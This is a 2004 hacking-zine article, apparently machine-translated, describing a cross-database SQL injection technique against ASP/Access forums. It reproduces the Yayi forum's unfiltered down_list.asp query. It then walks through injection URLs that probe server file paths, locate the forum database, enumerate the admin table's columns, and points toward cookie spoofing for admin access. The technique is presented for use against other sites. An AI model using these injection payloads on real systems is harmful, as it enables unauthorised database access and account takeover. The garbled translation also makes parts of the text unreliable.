Cross-database query is also available.

Author: sniper Nature of the article: original Released on: 2004-02 2

From: www.4ngel.net E-mail: sniper@77169.com This article has been published in the "black guest XFile" ###################################### When you see this question, don't rush to find something to hit me. It is true that you can find a lot of information for cross-database queries, unlike in the past, I had to head on a lot of e-files. Today, I want to talk about a new method of cross-database query I found some time ago. You should listen carefully. As shown in the following example, the phantom Brigade and the gray track discussed the problem about a month ago: Http://www.target.com/show.asp? Id = 1 or 0 <> (select count (*) from Admin. c) The following error message is displayed: Microsoft Jet Database Engine error '20140901' The file 'C:/winnt/system32/admin. mdb' is not found '. You can see that, if you have read the learning report written by xhacker, you will surely be excited, because the report vaguely mentions a vulnerability in access, which can be dir C: // s! Let's continue and submit: Http://www.target.com/show.asp? Id = 1 or 0 <> (select count (*) from C:/boot. INI) Return Value: Microsoft Jet Database Engine error '20140901' The file 'C:/boot. mdb' cannot be found '. It looks like we can add a path to the part following from. If you want to pull dir, you need to pull cmd.exe, and then: Http://www.target.com/show.asp? Id = 1 or 0 <> (select count (*) from C:/winnt/system32/cmd.exe. c) Let's see the error message: Microsoft Jet Database Engine error '20140901' Unrecognized database format: 'C:/winnt/system32/CMD. EXE '. It seems that our hopes are lost. (After multiple practices, you can get the format of the file name following the from statement as follows: file name. suffix. any letter so that you can access the file name. the file with the suffix ). At this time, it seems that we can only determine whether a directory or a file exists. At that time, I thought it was a chicken-level vulnerability, just like many people thought it was boring and a pity. Later, I checked the security of the forum for a friend one day and looked at the Yayi forum. First, I tried the default database name. Submit: Submit. However, because the extension is. asp, we still cannot download its database. No way, I had to go to the hard drive for half a day and read the code from the original Yayi forum. The result is an exciting one. Download The down_list.asp file of the plug-in the forum to find such a piece of code: If request ("ID") = "" then Response. Write "You have not selected any software. Please return" Response. End End if Set rs = server. Createobject ("ADODB. recordset ") SQL = "select dclass. class, dnclass. nclass, download. showname, download. classid, download. nclassid, download. lasthits, download. downshow from download, dclass, dnclass where download. classid = dclass. classid and download. nclassid = dnclass. nclassid and download. id = "& request (" ID ") No, the & request ("ID") variable is replaced by the query statement without any filtering. We can perform SQL injection! It is easy to say, but it is difficult to do it. submit the following URL: Http://www.target.com/yabbs/down_list.asp? Id = 1% 20or % 200 <> (select % 20 count (*) % 20 from % 20 admin) Return to the page, OK. The admin table exists. Then confirm the column name for saving the User Name: Http://www.target.com/yabbs/down_list.asp? Id = 1% 20or % 200 <> (select % 20 count (*) % 20 from % 20 admin where username) Also succeeded. Save the username column and check the password column again: Http://www.target.com/yabbs/down_list.asp? Id = 1% 20or % 200 <> (select % 20 count (*) % 20 from % 20 admin where password) An error occurred. It's okay to have preparation. Try again. Finally, I tried all the column names I could think of. Since there was no correct one, it was my turn to be depressed. I asked the friend if he had processed the database, the answer is no. Open the default database. There are two databases under the Data Directory, one of which is 1yabbs. ASP (used for Forum), one is download. ASP (used to download the system), open it and check that there is no password column in it! It looks like I have no fun. Later, when I was chatting with mm, I suddenly thought of how to use it (not to mention that I was not focused on chatting with mm :). During SQL injection, we sometimes use the "Admin. ID" statement, where "admin" is the table name and "ID" is the column name. So can we take into account the chicken-rib vulnerability we discussed some time ago? Now, we have to practice it first. To use the method described at the beginning, we should first look for the web directory: Http://www.target.com/yabbs/down_list.asp? Id = 1% 20or % 200 <> (select % 20 count (*) % 20 from % 20c:/web/W. C. c) The following information is returned: Microsoft Jet Database Engine error '20140901' 'C:/web/W. c' is not a valid path. Check whether the path name is correctly spelled and whether it is connected to the server where the file is stored. /Yabbs/down_list.asp, row 37 The directory is incorrect: Http://www.target.com/yabbs/down_list.asp? Id = 1% 20or % 200 <> (select % 20 count (*) % 20 from % 20d:/web/W. C. c) This prompt has changed: Microsoft VBScript compiler error: '8000a03f6' 'End' missing' /IISHelp/common/500-100.asp, row 242 Microsoft Jet Database Engine error '20140901' The file 'd:/web/W. c' is not found '. /Yabbs/down_list.asp, row 37 This prompt shows that files cannot be found. Oh, it's easy to guess if you know the web directory. Submit again: Http://www.target.com/yabbs/down_list.asp? Id = 1% 20or % 200 <> (select % 20 count (*) % 20 from % 20d:/web/yabbs/datayabbs. asp. c) This OK time, I directly guessed the specific path, but the prompt is exactly the same as my idea. It is really ##@ @ (at this time, I am excited for 10 seconds ......) The returned information is: Microsoft VBScript compiler error: '8000a03f6' 'End' missing' /IISHelp/common/500-100.asp, row 242 Microsoft Jet Database Engine error '80040e37' The Microsoft Jet Database Engine cannot find the input table or query 'C '. Check whether it exists and whether its name is correctly spelled. Now everything is simplified. Submit the query statement to determine the table and column name. Http://www.target.com/yabbs/down_list.asp? Id = 1% 20or % 200 <> (select % 20 count (*) % 20 from % 20d:/web/yabbs/datayabbs. asp. Admin % 20 where % 20 username) If it is displayed successfully, the admin table and username column exist in the Database 1yabbs. asp. Then query the id value and submit the following URL: Http://www.target.com/yabbs/down_list.asp? Id = 1% 20or % 200 <> (select % 20 count (*) % 20 from % 20d:/web/yabbs/datayabbs. asp. Admin % 20 where % 20id = 1) The page is displayed successfully. Now I don't need to talk about anything. Everyone will do it. The following part is for you. What can we do in the above analysis process? In the face of a large site, you know the name of the database (for example, the content mentioned in the previous article on the mobile network explosion Library Vulnerability that I wrote, and the database name of the mobile network forum is obtained, however, his database cannot be downloaded, and the program does not have other known Injection Vulnerabilities .) We can try to use the SQL injection vulnerability of other programs in that station for cross-database query. First, we can guess the web path and then perform cross-database query to get the password of the Forum, then, you can get the front-end permission by performing cookie spoofing. There are a lot of places to use. You can explore it by yourself. After all, to turn others' technologies into your own, you must expand others' ideas to study.